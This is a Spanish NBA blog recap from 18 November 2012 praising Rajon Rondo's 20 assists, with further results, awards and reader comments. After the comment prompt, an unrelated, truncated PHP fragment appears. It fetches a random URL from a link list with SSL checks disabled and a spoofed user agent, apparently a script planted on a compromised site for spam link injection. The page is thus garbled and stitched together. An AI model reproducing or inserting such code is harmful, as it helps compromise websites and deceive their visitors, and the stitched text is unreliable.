La Crónica: Rajon Rondo es una máquina

18 de November de 2012 por Sancho88

Noche de relativa tranquilidad en la NBA. Resultados previsibles, rookies horneándose a fuego lento, los Wizards volando hacia el 0-10, los osetes liderando la liga con su octava victoria consecutiva frente a unos peleones Bobcats, los Spurs destrozando a unos inofensivos Nuggets desde el triple (16/27 en T3, es decir, un 60%) y los Heat sobreviviendo con suficiencia en Phoenix ante la baja del capitán Wade gracias a los otros dos bichos.

Todo apacible, tan gentil y plácido que parece mentira. Y entre toda la normalidad, un extraterrestre que viste de blanco y verde nos ha eclipsado con sus 20 asistencias. Rajon Rondo lo ha vuelto a hacer. Se vistió de super héroe, de base antiguo de los 80 o 90 y firmó por trigesimo tercera vez consecutiva -como apuntó Rumbero en los comentarios- más de 10 asistencias. Las 20 de ayer fueron claves para la victoria vespertina frente a los Raptors (89-107), y además situan a Rondo a la altura de mitos vivientes como Magic, Stockton, Nash y Kidd -como también apuntó Rumbero-. Todo ellos (y desde esta noche también Rondo) reunen el mérito de conseguir 20 asistencias en menos de 33 minutos.  Nos quitamos el sombrero Rondo. Jason Terry, con 20 puntos, fue el principal beneficiario de sus pases, pero Pierce (19) y Garnett (15) no se quedaron sin sus regalos de fin de semana frente a los canadienses. Además, Sullinger nos deleitó con su gran juego de pies en el poste bajo y consiguió el primer doble-doble de su carrera (12-11), y Jeff Green también demostró que si le dan minutos él responde con acciones salvajes. Los Celtics tienen banquillo y están dispuestos a usarlo. En los dinosaurios John Lucas III fue el mejor del equipo con 15 puntos y eso no dice nada bueno de los Raptors. Un desastre el ‘frontcourt’ titular, con 20 puntos entre Bargnani, McGuire y Valanciunas (tranquilo chaval, era tu bautismo en el Garden frente a KG), y Calde salvándose más o menos de la quema con 10 puntos y 9 asistencias.

En Charlotte siguió la racha imparable de los Grizzlies. Si el viernes alcanzaron por primera vez en su historia el Top 1 de la liga en temporada regular, anoche consolidaron su posición frente a los Bobcats guiados nuevamente por Marc Gasol y Z-Bo en la octava victoria consecutiva (94-87). Impresionante el dominio de los osos amorosos en la zona felina en el último cuarto. Conley arremetió con 20 puntos, Marc casi llega al triple-doble (12-9-7) y Randolph firmó otro doble-doble de categoría (18-12) y no sería de extrañar que se llevase el MVP de la semana en la Conferencia Oeste. Una victoria que seguramente se la dedicarán al recientemente fallecido Kenny “Eggman” Williamson, quien fuera asistente del GM de los Grizzlies Chris Wallace. En los Bobcats pelearon todos, destacando Byron Mullens con 18 puntos y 9 rebotes, y entre Kemba Walker, Gilchrist y Sessions a punto estuvieron de dar un buen susto en el último cuarto. Una vez más, los jóvenes pupilos de Jordan, Dunlap o quien sea que se encarga de su tutela, demostraron que pueden ser peligrosos frente a cualquiera. Aún conservan el 50% de victorias y siguen sorprendiendo en su resaca en el purgatorio. Parece casi milagroso que hayan logrado superar su ‘annus horribilis’, pero, no obstante, ahí están, peleando el 8º puesto de la Conferencia Este.

En el AT&T Center Manu Ginobili volvió a hacer de las suyas en la abultada victoria sobre los Nuggets (100-126). El escolta argentino anotó 20 puntos saliendo desde el banquillo, liderando a los texanos desde la línea de 3. Suyos fueron 5 de los 16 triples del equipo, Danny Green sumó otros 3 y hasta Timmy Duncan se sumó al sabotaje. Gran partido también de DeJuan Blair saliendo de titular (19-8), demostrando qué Popovich se equivocaba al no contar con él. En los Nuggets no podemos destacar a nadie, tan solo las 22 pérdidas de balón, capitaneadas por Lawson y Gallinari. Asi es del todo imposible llegar a ‘semis’ de conferencia como pretenden estos chicos.

Milwaukee sigue con su gran inicio y ayer la víctima fueron los Hornets de Anthony Davis (113-117). A pesar de los 28 puntos y 11 rebotes del rookie, Zipi y Zape decantaron el triunfo para los Bucks. Los gemelos Jennings y Ellis, tan diferentes que asustan, ayer se fusionaron en el Super Saiyajin JenEllis y sumaron 22 puntos y 9 asistencias por cabeza, con un 8/16 en tiros de campo cada uno. A mí que me lo expliquen, porque si estos dos empiezan a conectar de esta manera, yo me voy al pueblo francés a pasar el fin de año. Por lo que pueda pasar.

Otros resultados destacados de la jornada se dieron en el Staples rojo (80-101), con Blake Griffin destapando por fin el tarro de las esencias con un doble-doble (26-10) y liderando la victoria de los Clippers frente a los Bulls. Jamaal Crawford siguió a su rollo con 22 puntos, y en los Bulls nada pudo hacer el All-stariano Boozer, quien un día más volvió a sorprender (22-12); Miami ganó sin Wade a los Suns (97-88), gracias al trabajo combinado de Bosh y James (45 puntos entre los dos) y los 4 triples de Shane Battier, quien sigue en racha. En Phoenix nada se supo de la pareja Scola-Gortat. Mala señal si no son capaces de arrimar el hombro contra la zona de los Heat; en Cleveland los Mavericks se recuperaron con una victoria balsámica de su particular racha negativa (103-95). Mayo volvió a liderar al equipo con 19 puntos, y hasta 5 compañeros le ayudaron firmando dobles figuras en anotación. Troy Murphy con 3 triples auyentó en el último cuarto la reacción envenenada del debatido Kyrie Irving. El ‘sophomore’ quiso poner algo de paz en nuestro particular debate del fin de semana y se marcó 26 puntos, aunque sus ‘Cavs’ se la volvieron a pegar. Varejao fue un ser mortal esta vez y solo anotó 4 puntos y 7 rebotes.

Y por último, los Wizards dejaron muy claro que su depresión va para largo frente a los Jazz (83-76). Wittman no encuentra la tecla adecuada. Esta vez lo intentó con Vesely de titular, Beal desde el banquillo, Jordan Crawford lanzando desde el inicio… pero el resultado volvió a ser el mismo. Al Jefferson anotó 17 puntos en el tercer cuarto y ahí se acabó la aventura. Parecía que Trevor Ariza iba a reivindicarse, cuando sumaba 16 puntos al descanso. Pues bien, hasta ahí llegó. Wall, te necesitan. Es urgente.

PREMIOS

MVP: Sin discusión, las 20 asistencias y 6 puntos de Rajon Rondo eclipsaron toda la jornada. Este tipo de partidos le deben doler a todo el staff técnico de USA Team. Un ¡Zas, en toda la boca! de manual. En el blog nos tenemos que rendir ante este señor, ante Doc Rivers por entretenernos y ante los Celtics que son viejos pero molan.

Rookie: Si ayer era Lillard el mejor, esta noche lo fue Anthony Davis en la nueva derrota de sus paupérrimos Hornets. Ni jugando en modo leyenda les consigue dar la victoria. Sus 28 puntos y 11 rebotes también se tendrán en cuenta un poco debajo de estas líneas. Otros ‘rookies’ que tuvieron una buena noche individual fueron Jared Sullinger, quien firmó el primer doble-doble de su carrera (12-10), Dion Waiters, con 16 puntos, a pesar de que no pudo evitar la derrota frente a Dallas, y Terrence Ross y Evan Fournier, en Toronto y Denver respectivamente, al firmar unos dignos 10 puntos cada uno. Buena progresión para ellos. Sin embargo, Beal sigue de capa caída en los Wizards y se marchó a casa con solo 6 puntos. Hay que recordar su bolita número 2. A ver si empieza a dar más de sí… Tyler Zeller también es otro Expediente X. Tan solo 3 puntos anoche.

Sorpresa: Jermaine O’Neal sigue jugando buenos partidos. Ayer 10 puntos y 6 rebotes. El rookie Sullinger aprovechó los minutos de Rivers y se fue hasta el doble-doble (12-11). Jordan Crawford se vio libre y desatado y jugó un partido muy decente para sus cualidades. 20 puntos y 8 asistencias para el escolta de los Wizards. Sorpresón para él. También merece aparecer en esta sección DeJuan Blair, y es que el pívot respondió de fábula ante la llamada del ‘coach’ Popovich. 18 puntos y 9 rebotes saliendo de titular. Así se hace.

Decepción: Jonas Valanciunas. 3 puntos, 2 rebotes y 6 faltas en 19 minutos. La próxima vez que visite a Garnett debería haber aprendido algo más. También decepcionaron Varejao para los Cavaliers, con 4 puntos y 7 rebotes; Austin Rivers (6 puntos en 22 minutos), quien sigue muy tierno en los nuevos Hornets; Iguodala con sus 9 puntos y 3 rebotes en la derrota del equipo que debería capitanear en teoría; Joakim Noah (0/6 en TC en 30 minutos), quien dejó muy solo a Boozer; pero el premio final se va hasta Phoenix, a la pareja Gortat-Scola. 7 puntos y 7 rebotes entre los dos en 40 minutos frente a la zona de los Heat. Un desastre auténtico.

Esfuerzo en vano: Lo avisamos en el premio del rookie. Los 28 puntos y 11 rebotes de Anthony Davis en la derrota contra Milwaukee no le valieron de absolutamente nada al ex de los Wildcats. Los 26 puntos de Irving frente a los Mavericks también se merecen su espacio en el MEV. Gana Davis, sin embargo.

Imágenes | AP Photos / Getty Images

Comenta

22 comentarios a esta entrada

  1. simon dice:
    #1

    Madremia Crawford como siga asi es que el premio a mejor sexto hombre se le va a quedar pequeño… esta a nivel all-star. Como siga creciendose va a luchar por el MVP y todo jajajja

      Citar

  2. Colo dice:
    #2

    Me impresiona el rendimiento de Jamal Crawford. De hecho la NBA está en un momento dulce porque muchos jugadores están dando de si más de lo esperado y, esto, es muy bueno.

    Por cierto, los Memphis tienen un montón de partidos en casa ahora. A ver si continúan su racha. Hasta el 1 de diciembre que no juegan fuera, lo harán en San Antonio. Esta semana, el viernes, reciben a Los Angeles Lakers.

    Enhorabuena por la crónica. Muy completa y divertida, como siempre.

    Saludos cordiales,

    Colo
    Presentador y comentarista del canal de Youtube NBATVColo

      Citar

  3. GreenPride dice:
    #3

    Grande Rondo y claro que los Ceotics molan Aun no han ganado a ningum equipo importante pero van acoplando piezas y Green y Sully empiezan a rendir al igual que Terry Me impresiona cada dia mas Memphis y Clippers Si les respetan las lesiones Lakers y Thunder van a tener enemigos potentes Por el Oeste

      Citar

  4. Esteban dice:
    #4

    aqui hubo dudas de q tan buenos son hoy y que tan buenos seran mañana los clippers, bueno creo que sus dueños pueden estar tranquilos

    les faltan billups y hill y son indetnibles, los nuevos SUNS de d´antoni, con cp3 por nash y griffin por amare, velocidad explosion pocas veces vistas, si a eso le sumamos un banco q cuenta con crawford y bledsoe y que pronyo tendra tambien a grandt hill y willie green saliendo de alli, ojo, hasta matt barnes se esta saliendo!
    si odom, fuera algo parecido a ODOM, serian un candidato total

    en cuanto al futuro, muchos creian q CP3 no renovaria y se les vendria todo abajo, pues nada de eso, creo que paul solo cambiaria si sale una buena oferta de los MAVS q podria tentarlo y de que manera, pero aun en ese caso, bledsoe esta en condiciones del ser el base de este equipo, sumemosle a butler, crwaford, jordan y griffin tienen contratos, hay una bse para seguir en PO, no para campeones, pero el futuro no es an absoluto oscuro

      Citar

  5. rumbero dice:
    #5

    Una maravilla Rondo. Siempre vale la pena ver un partido donde juegue este señor. Y si, espero que Valanciunas llevará papel y lápiz para tomar nota porque Garnett le hizo un hijo en 5 minutos.
    Muy completitas las crónicas del finde Sancho!

    De los que me he llevado una “agradable” sorpresa el rato que los he visto son los Bobcats.

    Esteban:
    aqui hubo dudas de q tan buenos son hoy y que tan buenos seran mañana los clippers, bueno creo que sus dueños pueden estar tranquilos

    La verdad es que estan jugando muy bien. Como dicen más arriba Crawford les está dando otra dimensión. El otro día hablabas de los Bobcats y hoy los he visto y me he llevado una “agradable” sorpresa teniendo en cuenta que estaban delante los intratables Grizzlies. Han tenido un momento de locura transitoria en el último cuarto con Kemba haciendo como 10 puntos seguidos en nada la mar de divertido. Y Kidd-Glifhghxys mola

      Citar

  6. rumbero dice:
    #6

    Del Pacers-Knicks mejor ni hablar. Bacalá ínfame. Por mucha lesión de Granger no puede ser que de golpe los Pacers no metan ni una

      Citar

  7. Esteban dice:
    #7

    Si rumbero, aun son un equipo flojo, pero extrañamente tienen mucho corazon, MKG y walker son los mayores responsables transmitiendo el amor propio a tios como haywood, sessions y gordon, hasta tyrus thomas parece jugar con algo de intensidad

    Dunlap o como se llame de donde viene? Esta haciendo un extraordinario trabajo

      Citar

  8. Santi dice:
    #8

    Super Saiyadin… jajajajaja que grande

      Citar

  9. Jose Luis dice:
    #9

    18 puntos Blatche en 10 minutos, 9 de 9 en tiros… pobre Sancho, está masacrando a sus Kings

      Citar

  10. Esteban dice:
    #10

    Los nets son un tema extraño, wallace 1 punto y jojo 0, y salen watson con 11 y blatche con 18, no digo q las rotaciones sean malas, mejor cuanto mas alternativas hay, pero depender de blatche y watson es pan para hoy y hambre para mañana

    Lo jojo empieza a ser preocupante enserio, sabemos q es un jugador ago sobrevaluado, sobretodo contractyualmente, pero siempre fue el lider y buen anotador en los hawks, sucede q en los nets esta luciendo realmente mal, se esfuerza por crearse jugadas y anotar y no funciona en absoluto, parece no tener jugadas para el y no le gusta el rol de tirador eventual, quiere ser una estrella si o si
    Si bien los nets ganan y muestran variantes y jugadores en niveles altos, en ofensiva dejan mucho q desear, los salva si una extrañamente buena defensa, marca registrada de su entrenador

      Citar

  11. Esteban dice:
    #11

    bueno, sigo viendo el juego y lo de jhonson es peor de lo que decia en el comentario anterior, esta entrando en una espiral autodestructivo muy peligroso, fallo un libre y dos triples abiertos son marca, falta de confianza total, se que son rachas, pero…

      Citar

  12. Esteban dice:
    #12

    bueno acabo de ver NETS vs KINGS

    sobre sacramento solo dos cosas que decir:

    1- q bueno es COUSINS, una agilidad, un toque y una muñeca como para promediar 25 ppp
    2- q malos que son los KINGS, pierden un partido frente a unos nets jugando al trote, nisiquiera fueron dominados y aun asi, nunca pudieron generar una paridad real en el desarrollo

    sobre los nets

    MarShon Brooks confirma sensacines, puede ser un enorme anotador, su nivel y el de watson maquillan la temporad ESPANTOSA DE JOJO,
    el resto lo de siempre, eso si, Q PENA QUE TELETOVIC CAYO EN ESTE EQUIPO, sin dudas en otro lugar estaria saliendo de titular, por ejemplo los BOBCATS, moneda de cambio? algun equipo tiene q tener agendado el potencial de mirza

      Citar

  13. Esteban dice:
    #13

    ah y sancho amigo, disculpame q te iga, ya que dijiste q los kings no necesitaban a LILLARD, thomas y brooks son de las peores, sino la peor, de toda la na

      Citar

  14. MagicJohnson32 dice:
    #14

    Mmm, ha habido cambios en Sacramento. Isaiah Thomas y James Johnson al banquillo y con pocos minutos, Brooks y Salmons titulares (y haciendo la risa ambos).

    Yo he visto un rato el Sixers-Cavs. Gran partido de Turner en uno de sus días buenos que te hacen pensar que puede ser un súper crack. Ha conducido a Philly a una renta cómoda pero al final, con la pelea de Varejao y Tristan Thompson, que han cogido entre los dos algo así como 15 rebotes de ataque, Cleveland ha apretado el marcador. Parecía que se llegaría a un final ajustado pero Spencer Hawes y algunos ataques malos de los Cavs han sentenciado. Mal Irving hoy.

      Citar

  15. MagicJohnson32 dice:
    #15

    Primer triple doble en la carrera de Kevin Durant. Lógicamente, tenía que ser ante Golden State.

      Citar

  16. Esteban dice:
    #16

    es tarde asi q no voy a poder terminar de ver a los lakers, asi que comento lo que me ha parecido su arranque de juego

    en principio los veo muy muy mejorado en esta nueva version a VAMOS A VER QUIEN ANOTA MAS PUNTOS
    los lakers no pueden defender con intesidad a nadie, kobo como exelente defensor solo le queda la fama, ya no tien piernas para eso, a DH12 le falta ritmo para ser el de ptras epocas y hablando de famas, lo mismo pasa con metta

    asi q los veo muy beneficiados por el relajo de defensa pensando mas en anotar, y anotaciones a juego rapido e indivicual tambien los beneficia, mas que jugadas mecanizadas como si fueran jugadores cualquiera

    kobe y howard juntos pueden hacer historia si se entienden un poquito mas, cuando kobe penetra es un peligro como pocos en la liga, llama la atencion de todo el equipo rival y alli esta supermar para liquidar su LOB, una jugada sencilla que de practicarse, puede hacer un anotador estilo shaq a howard

      Citar

  17. Esteban dice:
    #17

    o como recien, si los rivales se preocupan por el lob de HOWARD, kobe se va hasta el aro, la primer bandeja limpia en 5 contra 5 que le recuerdo a kobe

      Citar

  18. MagicJohnson32 dice:
    #18

    Final del primer cuarto, 40-29, con 11 puntos, 7 rebotes y 5 asistencias de Kobe. Brutal.

      Citar

  19. Alfredo dice:
    #19

    Dos apuntes:

    El primero es para los que siguen a los Thunder… Os habéis dado cuenta cómo están bajando ultimamente los balones perdidos de Westbrook?? Antes casi hacía triple doble con esa estadística, ahora lleva varios partidos que al descanso lleva 0 o 1.

    Algo ha cambiado en los Lakers para muy muy bien: que lleven al final del primer cuarto (tampoco los Rockets son discípulos de Bowen en defensa) 40 puntos, como en muchos partidos con Mr Potato al descanso…ganar no se si ganarán el anillo porque la parte alta del oeste está dura con narices, pero pasárselo bien en el Staples ahora sí

      Citar

  20. Esteban dice:
    #20

    Si la fluidez individual con tanta riqueza, es preferible a la rigidez

    Muy atentos todos a kobe armando, q bien lo hace, con el armando juego duhon puede quedarse de tirador y alli es mas util

    No se si fue idea de dantoni o si esta lesionado, pero q bien les hace a los lakers que no juegue blake

      Citar

  21. Chipi dice:
    #21

    Me estoy acordando que en la porra puse a los Wizards como equipo de playoff y Isiah Thomas como MIP. Siempre fui un visionario.

    Kobe en este plan mola. Mola mucho.

      Citar

  22. MagicJohnson32 dice:
    #22

    Hay cosas de la conexión Kobe-Howard que recuerdan tantísimo a Kobe-Shaq…

    Qué difícil lo van a tener los rivales para seguirle el ritmo a estos Lakers, son demoledores.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>